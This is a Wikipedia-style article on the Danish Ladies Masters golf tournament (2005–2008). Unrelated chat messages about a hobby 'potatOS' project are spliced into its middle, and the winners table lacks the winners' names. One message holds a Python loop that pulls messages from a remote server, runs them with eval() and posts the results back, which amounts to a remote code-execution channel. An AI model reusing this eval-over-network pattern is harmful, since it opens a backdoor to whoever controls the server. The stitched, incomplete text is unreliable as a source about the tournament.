Danish Ladies Masters
The Danish Ladies Masters, known for sponsorship reason as the Nykredit Masters, was a women's professional golf tournament on the Ladies European Tour that took place in Denmark.
Tournament information | |
---|---|
Location | Denmark |
Established | 2005 |
Par | 72 |
Tour(s) | Ladies European Tour |
Format | Stroke play |
Final year | 2008 |
Tournament record score | |
Aggregate | 273 Iben Tinning (2005) 273 Karen Margrethe Juul (2006) |
To par | −15 as above |
Final champion | |
The tournament was first played in 2005 and the final edition was held in 2008.
Winners
Year | Venue | Location | Winner | Score | To par | Notes |
---|---|---|---|---|---|---|
2008 | Simon's Golf Club | Kvistgård | 205 | –14 | 54-holes (rain)[1] | |
2007 | Helsingør Golf Club | Nordsjælland | 275 | –9 | Won the playoff with Kiran Matharu and Kirsty Taylor[2] | |
2006 | Odense Eventyr Golf | Odense | 273 | –15 | [3] | |
2005 | Kokkedal Golfklub | Nordsjælland | 273 | –15 | [4] |
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
See also
References
- Ladies European Tour. "Nykredit Masters 2008". Archived from the original on 2014-10-17.
- Ladies European Tour. "Nykredit Masters 2007". Archived from the original on 2014-10-17.
- Ladies European Tour. "Nykredit Masters 2006". Archived from the original on 2014-10-17.
- Ladies European Tour. "Nykredit Masters 2005". Archived from the original on 2014-10-17.
External links
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.